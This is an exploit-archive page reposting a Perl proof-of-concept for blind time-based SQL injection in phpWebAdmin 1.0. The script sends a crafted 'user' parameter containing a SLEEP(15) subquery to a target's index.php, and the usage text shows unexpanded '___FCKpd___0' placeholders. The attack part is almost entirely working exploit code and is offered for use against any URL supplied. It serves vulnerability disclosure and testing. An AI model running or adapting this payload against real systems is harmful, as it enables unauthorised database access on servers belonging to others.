首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpWebAdmin 1.0 SQL Injection
来源:N_A[at]tutanota.com 作者:N_A 发布时间:2016-11-16  
#!/usr/bin/perl -w

#phpWebAdmin Version 1.0 SQL Injection Proof Of Concept Exploit
#===============================================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================



#Description
#============
#
# php web admin file and folder manager.
#
# currently version 1.0
# more features to come
#
# https://sourceforge.net/projects/chrisphpadmin/


#Vulnerability
#==============

#The 'user' parameter in the index.php file is vulnerable to a blind SQL time-based Injection attack. Proof of concept is exploit attached below




#Proof Of Concept
#=================


use strict;
use LWP::Simple;

my ($url ) = @ARGV;
if (not defined $url)

{

   print "=========================================\n";
   print "phpWebAdmin SQL Injection Exploit\n";
   print "\tBy N_A\n";
   print "\n";
   print "___FCKpd___0  [URL]\n";
   print "___FCKpd___0 127.0.0.1\n";
   print "=========================================\n";
   exit;
	
}



my $file = '/phpWebAdmin/index.php';
my $injection = 'user=a\' AND (SELECT * FROM (SELECT(SLEEP(15)))MdWH) AND \'gpey\'=\'gpey&pass=p&login=login';  #Sleep for 15 seconds
my $request = "http://".$url.$file."?".$injection;



print "#####################################################\n";
print "SQL Injection: The server will sleep for 15 secs\n";
print "#####################################################\n";


my $content = get $request;

die "could not get $request" unless defined $content;




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·txtforum 1.0.4 Remote Command
·Trend Micro Smart Protection S
·Linux Kernel 4.4 (Ubuntu 16.04
·BlackNurse Spoofed ICMP Denial
·Disk Pulse Enterprise 9.0.34 -
·Easy Internet Sharing Proxy Se
·Microsoft Internet Explorer 11
·Microsoft Edge 11.0.10240.1638
·Boonex Dolphin 7.3.2 - Authent
·Linux Kernel (Ubuntu / RedHat)
·Schoolhos CMS 2.29 - Remote Co
·Microsoft Windows - VHDMP Arbi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved